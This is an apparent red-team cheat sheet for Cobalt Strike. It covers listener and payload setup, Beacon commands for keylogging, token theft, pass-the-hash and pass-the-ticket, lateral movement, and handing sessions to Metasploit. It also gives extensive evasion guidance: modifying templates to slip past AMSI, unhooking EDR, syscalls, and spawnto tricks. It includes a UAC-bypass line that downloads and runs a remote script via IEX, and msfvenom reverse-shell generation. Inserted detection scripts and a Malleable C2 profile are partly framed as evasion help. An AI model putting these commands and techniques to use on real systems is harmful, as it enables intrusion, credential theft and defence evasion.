Cobalt Strike
Listeners
C2 Listeners
Cobalt Strike -> Listeners -> Add/Edit
then you can choose where to listen, which kind of Beacon to use (http, dns, smb...) and more.
Peer2Peer Listeners
Beacons of these listeners don't need to talk to the C2 directly; they can communicate with it through other Beacons.
Cobalt Strike -> Listeners -> Add/Edit
then you need to choose TCP or SMB beacons
- A TCP beacon will start a listener on the selected port. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon.
- An SMB beacon will listen on a named pipe with the selected name. To connect to an SMB beacon you need to use the command `link [target] [pipe]`.
Generate & Host payloads
Generate payloads in files
Attacks -> Packages ->
- HTMLApplication for HTA files
- MS Office Macro for an Office document with a macro
- Windows Executable for a .exe, .dll or service .exe
- Windows Executable (S) for a stageless .exe, .dll or service .exe (stageless is better than staged: fewer IoCs)
Generate & Host payloads
Attacks -> Web Drive-by -> Scripted Web Delivery (S)
This will generate a script/executable to download the Beacon from Cobalt Strike in formats such as: bitsadmin, exe, powershell and python
Host Payloads
If you already have the file you want to host on a web server, just go to Attacks -> Web Drive-by -> Host File and select the file to host and the web server configuration.
Beacon Options
# Execute local .NET binary
execute-assembly
# Note that to load assemblies larger than 1MB, the 'tasks_max_size' property of the malleable profile needs to be increased.
# Screenshots
printscreen # Take a single screenshot via the PrintScr method
screenshot # Take a single screenshot
screenwatch # Take periodic screenshots of the desktop
## Go to View -> Screenshots to see them
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the pressed keys
# portscan
portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject the portscan action into another process
portscan [targets] [ports] [arp|icmp|none] [max connections]
# Powershell
## Import Powershell module
powershell-import C:\path\to\PowerView.ps1
powershell-import /root/Tools/PowerSploit/Privesc/PowerUp.ps1
powershell # This uses the highest supported PowerShell version by spawning powershell.exe (not opsec)
powerpick # This creates a sacrificial process specified by spawnto and injects UnmanagedPowerShell into it for better opsec (no PowerShell logging)
powerpick Invoke-PrivescAudit | fl
psinject # This injects UnmanagedPowerShell into the specified process to run the PowerShell cmdlet.
# User impersonation
## Token generation with creds
make_token [DOMAIN\user] [password] # Create a token to impersonate a user on the network
ls \\computer_name\c$ # Try to use the generated token to access C$ on a computer
rev2self # Stop using the token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but it can be narrowed down by filtering on the Logon Type: make_token uses LOGON32_LOGON_NEW_CREDENTIALS, which is logon type 9.
# UAC Bypass
elevate svc-exe
elevate uac-token-duplication
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
## Steal token from pid
## Like make_token but stealing the token from a process
steal_token [pid] # Also, this is useful for network actions, not local actions
## From the API documentation we know that the NEW_CREDENTIALS logon type used by make_token "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current user>: it is impersonating our own cloned token, with the new credentials only applied to network access.
ls \\computer_name\c$ # Try to use the stolen token to access C$ on a computer
rev2self # Stop using the token from steal_token
## Launch process with new credentials
spawnas [domain\username] [password] [listener] # Do it from a directory with read access like: cd C:\
## Like make_token, this will generate Windows event 4624: An account was successfully logged on, but with logon type 2 (LOGON32_LOGON_INTERACTIVE). It will identify the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
## Inject into process
inject [pid] [x64|x86] [listener]
## From an OpSec point of view: don't perform cross-architecture injection unless you really need to (e.g. x86 -> x64 or x64 -> x86).
## Pass the hash
## This process requires patching LSASS memory, which is a high-risk action: it requires local admin privileges and is not very feasible if Protected Process Light (PPL) is enabled.
pth [pid] [arch] [DOMAIN\user] [NTLM hash]
pth [DOMAIN\user] [NTLM hash]
## Pass the hash through mimikatz
mimikatz sekurlsa::pth /user: /domain: /ntlm: /run:"powershell -w hidden"
## Without /run, mimikatz spawns cmd.exe; if you are running as a user with a Desktop, they will see the shell (if you are running as SYSTEM you are fine)
steal_token [pid] # Steal the token from the process created by mimikatz
## Pass the ticket
## Request a ticket
execute-assembly /root/Tools/SharpCollection/Seatbelt.exe -group=system
execute-assembly C:\path\Rubeus.exe asktgt /user: /domain: /aes256: /nowrap /opsec
## Create a new logon session to use the new ticket (so the compromised one is not overwritten)
make_token \ DummyPass
## Write the ticket to disk from a PowerShell session and load it
[System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
## Pass the ticket from SYSTEM
## Create a new process with the ticket
execute-assembly C:\path\Rubeus.exe asktgt /user: /domain: /aes256: /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
## Steal the token from that process
steal_token
## Extract ticket + Pass the ticket
### List tickets
execute-assembly C:\path\Rubeus.exe triage
### Dump the interesting ticket by luid
execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid: /nowrap
### Create a new logon session, note the luid and processid
execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
### Insert the ticket into the generated logon session
execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
### Finally, steal the token from that new process
steal_token
# Lateral Movement
## If a token was created it will be used
jump [method] [target] [listener]
## Methods:
## psexec x86 Use a service to run a Service EXE artifact
## psexec64 x64 Use a service to run a Service EXE artifact
## psexec_psh x86 Use a service to run a PowerShell one-liner
## winrm x86 Run a PowerShell script via WinRM
## winrm64 x64 Run a PowerShell script via WinRM
## wmi_msbuild x64 WMI lateral movement with an msbuild inline C# task (opsec)
remote-exec [method] [target] [command] # remote-exec doesn't return output
## Methods:
## psexec Remote execute via Service Control Manager
## winrm Remote execute via WinRM (PowerShell)
## wmi Remote execute via WMI
## To run a Beacon via wmi (it isn't in the jump command) just upload the Beacon and execute it
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
# Pass session to Metasploit - Through listener
## On the metasploit host
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST eth0
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > exploit -j
## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
beacon> spawn metasploit
## You can only spawn x86 Meterpreter sessions with the foreign listener.
# Pass session to Metasploit - Through shellcode injection
## On the metasploit host
msfvenom -p windows/x64/meterpreter_reverse_http LHOST= LPORT= -f raw -o /tmp/msf.bin
## Run msfvenom and prepare the multi/handler listener
## Copy the bin file to the cobalt strike host
ps
shinject x64 C:\Payloads\msf.bin # Inject the metasploit shellcode into an x64 process
# Pass metasploit session to cobalt strike
## Generate stageless Beacon shellcode: go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt strike shellcode
# Pivoting
## Open a socks proxy on the teamserver
beacon> socks 1080
# SSH connection
beacon> ssh 10.10.17.12:22 username password
Opsec
### Execute-Assembly
execute-assembly uses a sacrificial process and remote process injection to run the indicated program. This is very noisy, since injecting into a process uses certain Windows APIs that every EDR monitors. However, there are custom tools that can be used to load the assembly in the same process:
- https://github.com/anthemtotheego/InlineExecute-Assembly
- https://github.com/kyleavery/inject-assembly
- Katika Cobalt Strike unaweza pia kutumia BOF (Beacon Object Files): https://github.com/CCob/BOF.NET
The aggressor script https://github.com/outflanknl/HelpColor adds a helpx command to Cobalt Strike that colours each command according to how it runs: BOFs (green), Fork&Run (yellow) and so on, or process execution, injection and similar (red). This helps to know which commands are stealthier.
Act as the user
You can check events with Seatbelt.exe LogonEvents ExplicitLogonEvents PoweredOnEvents:
- Security EID 4624 - Check all interactive logons to learn the usual working hours.
- System EID 12,13 - Check the shutdown/startup/sleep frequency.
- Security EID 4624/4625 - Check valid/invalid NTLM attempts.
- Security EID 4648 - This event is created when plaintext credentials are used to log on. If a process generated it, that binary probably has the credentials in clear text in a config file or inside the code.
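The two detection angles described in this section and in the make_token/spawnas notes above (a logon type 9 from make_token, a 4648 from explicit credentials, and "what are this user's normal hours?") can be put together in a small log check. The script below is an added example, not part of the original page or of any Cobalt Strike tooling; the `Key=Value` event format and the event lines themselves are constructed for the example, so adapt `parse_event` to whatever your SIEM exports.

```python
import re
from collections import Counter

# Constructed sample events (not real logs): a minimal Key=Value rendering of
# Security 4624/4648 fields as a SIEM might export them. Values contain no spaces.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=2 TargetUserName=jking TargetOutboundUserName=- TimeCreated=2024-03-04T08:55:10",
    "EventID=4624 LogonType=2 TargetUserName=jking TargetOutboundUserName=- TimeCreated=2024-03-05T09:02:41",
    "EventID=4624 LogonType=9 TargetUserName=jking TargetOutboundUserName=svc_sql TimeCreated=2024-03-05T23:14:03",
    "EventID=4624 LogonType=3 TargetUserName=SRV-1$ TargetOutboundUserName=- TimeCreated=2024-03-05T23:14:05",
    "EventID=4648 SubjectUserName=jking TargetUserName=svc_sql ProcessName=C:\\Windows\\System32\\cmd.exe TimeCreated=2024-03-05T23:15:00",
    "EventID=4624 LogonType=10 TargetUserName=admin TargetOutboundUserName=- TimeCreated=2024-03-06T19:30:00",
]

NEW_CREDENTIALS = "9"                   # LOGON32_LOGON_NEW_CREDENTIALS: make_token / runas /netonly
INTERACTIVE_TYPES = {"2", "10", "11"}   # console, RDP, cached logon: what a real user generates


def parse_event(line):
    """Turn 'Key=Value Key=Value ...' into a dict (values have no spaces in this sample format)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def new_credentials_logons(lines):
    """(caller, outbound user, time) for every 4624 with logon type 9.
    Type 9 alone is not malicious; a caller that never did this before, outside their
    usual hours, is the signal the text above describes."""
    hits = []
    for ev in map(parse_event, lines):
        if ev.get("EventID") == "4624" and ev.get("LogonType") == NEW_CREDENTIALS:
            hits.append((ev["TargetUserName"], ev["TargetOutboundUserName"], ev["TimeCreated"]))
    return hits


def explicit_credential_use(lines):
    """4648: a process supplied plaintext credentials. Returns (subject, target, process)."""
    return [(ev["SubjectUserName"], ev["TargetUserName"], ev["ProcessName"])
            for ev in map(parse_event, lines) if ev.get("EventID") == "4648"]


def interactive_logon_hours(lines, user):
    """Histogram of the hour of day of a user's interactive logons: their 'normal' working hours."""
    hours = Counter()
    for ev in map(parse_event, lines):
        if (ev.get("EventID") == "4624" and ev.get("LogonType") in INTERACTIVE_TYPES
                and ev.get("TargetUserName") == user):
            hours[int(ev["TimeCreated"][11:13])] += 1
    return hours


def outside_working_hours(lines, user, slack=1):
    """Type-9 logons by `user` outside the hour range of their interactive logons (+/- slack hours)."""
    seen = interactive_logon_hours(lines, user)
    if not seen:
        return []
    lo, hi = min(seen) - slack, max(seen) + slack
    return [h for h in new_credentials_logons(lines)
            if h[0] == user and not lo <= int(h[2][11:13]) <= hi]


if __name__ == "__main__":
    for hit in new_credentials_logons(SAMPLE_EVENTS):
        print("make_token-like logon (type 9):", hit)
    for hit in explicit_credential_use(SAMPLE_EVENTS):
        print("explicit credential use (4648):", hit)
    print("jking interactive hours:", dict(interactive_logon_hours(SAMPLE_EVENTS, "jking")))
    print("out-of-hours type 9 for jking:", outside_working_hours(SAMPLE_EVENTS, "jking"))
```

From the red-team side the same functions tell you what to blend into: if your own make_token would show up as the only type 9 logon for that user at 23:14, steal an existing token or wait for the user's working hours instead.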
When using jump from Cobalt Strike, it's better to use the wmi_msbuild method so the new process looks more legitimate.
Use computer accounts
It's common for defenders to look for weird behaviours generated by users and to exclude service accounts and computer accounts like *$ from their monitoring. You can use these accounts to perform lateral movement or privilege escalation.
Use stageless payloads
Stageless payloads are less noisy than staged ones because they don't need to download a second stage from the C2 server: the stager's download request and the stage crossing the wire are well-known IoCs for network defences, and a tiny stager can't hide much. A stageless Beacon still performs its regular C2 check-ins after the initial connection, so it is the staging traffic that is saved, not the C2 traffic; pick a sensible sleep and jitter for that.
Tokens & Token Store
Be careful when you steal or create a token, because an EDR may be able to enumerate the tokens of every thread and find a token belonging to a different user, or even SYSTEM, inside the process.
The token store allows saving tokens in the Beacon so that you don't have to steal the same token again and again. This is useful for lateral movement or when you need to use an acquired token several times:
- token-store steal
- token-store steal-and-use
- token-store show
- token-store use
- token-store remove
- token-store remove-all
When moving laterally, it's usually better to steal a token than to create a new one or perform a pass-the-hash attack.
Guardrails
Cobalt Strike has a feature called Guardrails that restricts where a generated payload is allowed to run: at execution time the Beacon checks conditions such as the IP address range, the username, the server name or the domain name and exits if they don't match. This keeps the payload from detonating in a sandbox or on a host that is out of scope, where it would only hand defenders a sample to analyse.
Additionally, the repo https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks has some checks and ideas that you can consider before executing a payload.
Tickets encryption
In AD, be careful with ticket encryption. By default, certain tools will use RC4 encryption for Kerberos tickets, which is weaker than AES, and modern environments normally use AES. This can be detected by defenders monitoring for weak encryption types (an RC4 ticket request in 4768/4769 stands out where everything else is AES). Request tickets with AES keys, as in the Rubeus /aes256 examples above, to blend in.
Avoid Defaults
When using Cobalt Strike, by default the SMB pipes will be named msagent_#### and status_####. Change those names. It's possible to check the existing pipe names from Cobalt Strike with the command: ls \\.\pipe\
Moreover, with SSH sessions a pipe named \\.\pipe\postex_ssh_#### is created. Change it with set ssh_pipename "<new_name>"; in the profile.
Also, the post-exploitation (fork-and-run) pipes \\.\pipe\postex_#### can be changed with set pipename "<new_name>"; inside the post-ex block of the profile.
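The `ls \\.\pipe\` check above is easy to turn into something both sides can run: the red team to confirm a profile really replaced the defaults before a Beacon goes out, the blue team as a quick triage on a suspect host. The script below is an added example (not from the page or from Cobalt Strike); the patterns only cover the four default names the text mentions, the sample pipe listing is constructed, and live enumeration via `os.listdir` only works on Windows.

```python
import os
import re
import sys

# Default pipe-name patterns Cobalt Strike uses unless the profile overrides them
# (each '#' in the profile becomes a random hex digit). Only the defaults named in the text.
DEFAULT_CS_PIPES = {
    "smb_beacon": re.compile(r"^msagent_[0-9a-f]+$", re.I),      # SMB Beacon peer-to-peer (pipename)
    "stager":     re.compile(r"^status_[0-9a-f]+$", re.I),       # SMB staging (pipename_stager)
    "ssh":        re.compile(r"^postex_ssh_[0-9a-f]+$", re.I),   # SSH session (ssh_pipename)
    "post_ex":    re.compile(r"^postex_[0-9a-f]+$", re.I),       # fork-and-run jobs (post-ex pipename)
}


def classify_pipe(name):
    """Return which Cobalt Strike default a pipe name matches, or None."""
    name = name.rsplit("\\", 1)[-1]  # accept '\\.\pipe\foo' as well as bare 'foo'
    for label, pattern in DEFAULT_CS_PIPES.items():
        if pattern.match(name):
            return label
    return None


def flag_default_cs_pipes(pipe_names):
    """[(pipe, label)] for every pipe that still carries a default Cobalt Strike name."""
    hits = []
    for pipe in pipe_names:
        label = classify_pipe(pipe)
        if label:
            hits.append((pipe, label))
    return hits


def list_local_pipes():
    """Enumerate named pipes on the local Windows host (the equivalent of 'ls \\\\.\\pipe\\' in Beacon)."""
    if not sys.platform.startswith("win"):
        raise OSError("named-pipe enumeration only works on Windows")
    return [r"\\.\pipe" + "\\" + p for p in os.listdir(r"\\.\pipe\\")]


# Constructed sample listing: a few legitimate pipes plus the Cobalt Strike defaults.
SAMPLE_PIPES = [
    r"\\.\pipe\lsass", r"\\.\pipe\ntsvcs", r"\\.\pipe\srvsvc",
    r"\\.\pipe\msagent_4a", r"\\.\pipe\status_9c", r"\\.\pipe\postex_1f3b",
    r"\\.\pipe\postex_ssh_07ab", r"\\.\pipe\MsFteWds", r"\\.\pipe\postexam",
]

if __name__ == "__main__":
    pipes = list_local_pipes() if sys.platform.startswith("win") else SAMPLE_PIPES
    for pipe, label in flag_default_cs_pipes(pipes):
        print(f"{pipe}: default Cobalt Strike {label} pipe name")
```

The regexes anchor on the hex suffix, so a renamed pipe such as `postexam` or a profile that uses a non-hex suffix is not flagged; extend `DEFAULT_CS_PIPES` with whatever names your own historic profiles used.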
In Cobalt Strike profiles you can also change things like:
- Avoiding the use of rwx memory
- How the process injection behaviour works (which APIs will be used) in the process-inject {...} block
- How "fork and run" works in the post-ex {...} block
- The sleep time
- The maximum size of binaries that can be loaded in memory
- The memory footprint and DLL contents with the stage {...} block
- The network traffic
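As an added illustration of where each item in that list is set, here is a Malleable C2 fragment. It is not from this page nor a profile shipped with Cobalt Strike; the pipe names, spawnto binaries and numeric values are example choices to be adapted, and the http-get/http-post blocks that shape the network traffic are omitted.

```text
# Illustrative Malleable C2 fragment (example values, not a shipped profile)

set sleeptime "45000";          # ms between check-ins
set jitter    "30";             # +/- 30% jitter on the sleep
set tasks_max_size "2097152";   # allow execute-assembly of assemblies > 1MB (default 1MB)

# Replace the msagent_##, status_## and postex_ssh_## defaults
set pipename        "mojo.5688.8052.183894939787088##";
set pipename_stager "mojo.5688.8052.35780273329370##";
set ssh_pipename    "wkssvc_##";

post-ex {
    # Fork-and-run: the sacrificial process used by powerpick, execute-assembly, keylogger, ...
    set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
    set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
    set obfuscate "true";         # scrub the post-ex DLL headers in memory
    set smartinject "true";
    set amsi_disable "true";
    set pipename "DserNamePipe##, PGMessagePipe##";   # replaces postex_####
}

process-inject {
    set allocator "NtMapViewOfSection";
    set min_alloc "17500";
    set startrwx "false";         # never RWX: allocate RW, then flip to RX
    set userwx   "false";
    execute {
        CreateThread "ntdll!RtlUserThreadStart";
        SetThreadContext;
        NtQueueApcThread-s1;
        CreateRemoteThread;
        RtlCreateUserThread;
    }
}

stage {
    set userwx "false";
    set cleanup "true";
    set obfuscate "true";
    set sleep_mask "true";        # encrypt Beacon's memory while it sleeps
    set stomppe "true";
    set syscall_method "Indirect";
    set module_x64 "xpsservices.dll";
}
```

Check the result with `c2lint` before loading it: a profile that parses is not the same as one whose injection and stage settings actually work on the target build.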
Bypass memory scanning
Some EDRs scan memory for known malware signatures. Cobalt Strike allows replacing the sleep_mask function with a BOF that encrypts the backdoor in memory while it sleeps, so the signatures are not visible to the scanner between check-ins.
Noisy proc injections
Injecting code into a process is usually very noisy, because normal processes rarely do this and the ways to do it are very few, so it can be caught by behaviour-based detection. Moreover, it can also be detected by EDRs scanning for threads backed by code that doesn't exist on disk (although processes like browsers that use JIT have this normally). Example: https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2
Spawnto | PID and PPID relationships
When spawning a new process it's important to keep a normal parent-child relationship between processes to avoid detection. If svchost.exe executes iexplore.exe it will look suspicious, since svchost.exe is not a parent of iexplore.exe in a normal Windows environment.
When a new Beacon is spawned in Cobalt Strike, by default a process using rundll32.exe is created to run the new listener. This is not very stealthy and can be easily detected by EDRs. Moreover, rundll32.exe is executed without any arguments, making it even more suspicious.
With the following Cobalt Strike command you can specify a different process to spawn the new Beacon into, making it harder to detect:
spawnto x86 svchost.exe
You can also change this setting with spawnto_x86 and spawnto_x64 in a profile.
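The two signals in this section (rundll32.exe launched with no DLL argument, and a child whose parent makes no sense) are what a process-creation rule keys on. The script below is an added example, not code from the page or from any EDR; the parent allowlist is illustrative and deliberately small (build yours from your own Sysmon EID 1 baseline), and the events are constructed. Note the `svchost.exe` entry: changing spawnto to svchost.exe fixes the child's name but not its parent, so a Beacon spawning svchost.exe is still flagged.

```python
import ntpath

# Illustrative allowlist of normal parents for the children we care about (not an exhaustive baseline).
EXPECTED_PARENTS = {
    "rundll32.exe":   {"explorer.exe", "svchost.exe", "msiexec.exe", "services.exe"},
    "powershell.exe": {"explorer.exe", "cmd.exe"},
    "iexplore.exe":   {"explorer.exe", "iexplore.exe"},
    "dllhost.exe":    {"svchost.exe", "services.exe"},
    "svchost.exe":    {"services.exe"},   # svchost is only ever started by services.exe
}


def exe_name(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def analyse_process_event(ev):
    """Reasons this process-creation event looks like a spawned post-ex / Beacon process."""
    image, parent = exe_name(ev["Image"]), exe_name(ev["ParentImage"])
    cmdline = ev.get("CommandLine", "").strip()
    reasons = []
    # Default spawnto: rundll32.exe with no arguments. Legitimate rundll32 names a DLL and an entry point.
    if image == "rundll32.exe" and len(cmdline.split()) <= 1:
        reasons.append("rundll32.exe started without a DLL argument")
    # Tracked child with a parent outside its normal set, e.g. svchost.exe -> iexplore.exe from the text.
    expected = EXPECTED_PARENTS.get(image)
    if expected is not None and parent not in expected:
        reasons.append(f"unexpected parent {parent} for {image}")
    return reasons


def flag_process_events(events):
    """[(ProcessId, reasons)] for every event that has at least one reason."""
    out = []
    for ev in events:
        reasons = analyse_process_event(ev)
        if reasons:
            out.append((ev["ProcessId"], reasons))
    return out


# Constructed Sysmon-like process-creation events (not real telemetry).
SAMPLE_PROCESS_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},                 # normal
    {"ProcessId": 5232, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Users\jking\Desktop\update.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe"},                        # default spawnto
    {"ProcessId": 5301, "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"'},        # wrong parent
    {"ProcessId": 5310, "Image": r"C:\Windows\System32\dllhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"},  # normal
    {"ProcessId": 5400, "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Users\jking\AppData\Local\Temp\beacon.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs"},              # spawnto svchost.exe
]

if __name__ == "__main__":
    for pid, reasons in flag_process_events(SAMPLE_PROCESS_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

A spawnto target is therefore only as good as the parent it will have: pick a binary that is normally started by whatever process your Beacon lives in, and give it the arguments that binary normally carries.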
Proxying attackers traffic
Sometimes attackers need to be able to run tools locally, even on Linux machines, and make the victims' traffic reach those tools (e.g. NTLM relay).
Moreover, sometimes to perform a pass-the-hash or pass-the-ticket attack it's easier for the attacker to add the hash or ticket to their own LSASS process locally and pivot from there, instead of modifying the LSASS process of the victim machine.
However, you need to be careful with the generated traffic, since you might be sending unusual traffic (Kerberos?) from your backdoor process. For this you could pivot into a browser process (although you might get caught injecting into a process, so think about a stealthy way to do it).
### Avoiding AVs
#### AV/AMSI/ETW Bypass
Check the page:
<a class="content_ref" href="av-bypass.md"><span class="content_ref_label">Antivirus (AV) Bypass</span></a>
#### Artifact Kit
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
Don't forget to load the aggressor script `dist-pipe\artifact.cna` to tell Cobalt Strike to use the resources from disk that we want and not the built-in ones.
#### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what Defender (AMSI in this case) is flagging and modify it:
.\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressor script `ResourceKit\resources.cna` to tell Cobalt Strike to use the resources from disk that we want and not the built-in ones.
#### Function hooks | Syscall
Function hooking is a very common method used by EDRs to detect malicious activity. Cobalt Strike allows you to bypass these hooks by using **syscalls** instead of the hooked Windows API calls, selected with the `syscall_method` setting in the malleable profile: **`None`** keeps the standard Win32 API calls (the default), **`Direct`** issues the `Nt*` system call directly from Beacon's own code, and **`Indirect`** jumps to the `syscall` instruction inside the `Nt*` function in ntdll, so the call still appears to originate from ntdll. Depending on the system, one option might be stealthier than the other.
This can be set in the profile or using the command **`syscall-method`**.
However, this could also be noisy.
One option Cobalt Strike provides to bypass function hooks is to remove those hooks with: [**unhook-bof**](https://github.com/Cobalt-Strike/unhook-bof).
You could also check which functions are hooked with [**https://github.com/Mr-Un1k0d3r/EDRs**](https://github.com/Mr-Un1k0d3r/EDRs) or [**https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector**](https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector)
Working notes. Collecting BloodHound data from a Beacon (neo4j on the Windows client, then SharpHound via execute-assembly):
cd C:\Tools\neo4j\bin
neo4j.bat console
http://localhost:7474/ --> Change the password
execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL
Modifying the PowerShell template:
C:\Tools\cobaltstrike\ResourceKit
template.x64.ps1
Change $var_code -> $polop
$x --> $ar
cobalt strike --> script manager --> Load --> Load C:\Tools\cobaltstrike\ResourceKit\resources.cna
#artifact kit
cd C:\Tools\cobaltstrike\ArtifactKit
pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .